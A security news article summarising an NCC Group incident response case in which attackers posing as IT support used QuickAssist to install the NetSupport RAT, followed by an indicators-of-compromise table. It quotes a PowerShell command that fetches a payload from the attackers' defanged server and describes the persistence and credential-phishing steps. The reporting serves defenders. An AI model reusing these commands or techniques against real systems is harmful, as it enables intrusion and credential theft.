Threat actors successfully compromised corporate systems within just five minutes using a combination of social engineering tactics and rapid PowerShell execution.
The incident, investigated by NCC Group’s Digital Forensics and Incident Response (DFIR) team, demonstrates how cybercriminals are weaponizing trusted business applications to bypass traditional security measures.
Key Takeaways
1. Hackers impersonated IT support to gain QuickAssist remote access and compromised it in under 5 minutes.
2. Deployed NetSupport Manager RAT.
3. Legitimate tools weaponized through social engineering, requiring better user training.
QuickAssist Attack: 300-Second Compromise
The threat actors executed a carefully orchestrated campaign targeting approximately twenty users by impersonating IT support personnel.
Successfully convincing two victims to grant remote access, the attackers exploited Windows’ native QuickAssist.exe remote support tool to establish an initial foothold.
Within 300 seconds of gaining access, the adversaries deployed a series of PowerShell commands that downloaded offensive tooling and established multiple persistence mechanisms.
The attack sequence began with clipboard manipulation using the command (curl hxxps://resutato[.]com/2-4.txt).Content | Set-Clipboard, followed by the execution of obfuscated PowerShell scripts, reads the report.
The primary payload download occurred through a sophisticated steganographic technique, where malicious code was embedded within a JPEG file hosted at hxxps://resutato[.]com/b2/res/nh2.jpg.
The script employed XOR decryption with a 4-byte marker (0x31, 0x67, 0xBE, 0xE1) to extract and reconstruct a ZIP archive containing NetSupport Manager components, disguised as “NetHealth” software.
Credential Harvesting
The attackers demonstrated advanced tradecraft by implementing multiple persistence mechanisms.
They created scheduled tasks configured to execute every five minutes using regsvr32.exe with randomized DLL names, and established registry persistence via HKCUSOFTWAREMICROSOFTWINDOWSCURRENTVERSIONRUNNETHEALTH.
The malware utilized legitimate binaries like msiexec.exe and GenUp.exe for DLL side-loading attacks, deploying the trojanized libcurl.dll component.
Perhaps most concerning was the deployment of a sophisticated credential harvesting GUI that mimicked legitimate system authentication prompts.
The PowerShell-based interface (C:Users{username}Videosl.ps1) created a full-screen overlay with a convincing “System Credential Verification” dialog, capturing plaintext credentials to $env:TEMPcred.txt.
The interface disabled critical Windows functions, including taskbar access and various keyboard shortcuts, to prevent user escape.
Command and Control communication was established with multiple domains, including resutato[.]com and nimbusvaults[.]com, enabling remote management capabilities.
The attack’s success underscores the critical need for enhanced user awareness training and robust incident response capabilities, as even brief security breaches can result in significant organizational compromise.
| Value | Type | Comment |
|---|---|---|
resutato[.]com |
Domain | Command & Control |
hxxps://resutato[.]com/b2/st/st[.]php |
URL | Command & Control + Malware download |
hxxps://resutato[.]com/2-4.txt |
URL | Malware download |
hxxp://196.251.69[.]195 |
URL | Malware download |
196.251.69[.]195 |
IP Address | Malware download |
4e57ae0cc388baffa98dd755ac77ee3ca70f2eaa |
SHA1 | libcurl.dll |
df3125365d72abf965368248295a53da1cdceabe |
SHA1 | Update.msi |
Equip your SOC with full access to the latest threat data from ANY.RUN TI Lookup that can Improve incident response -> Get 14-day Free Trial
Source link
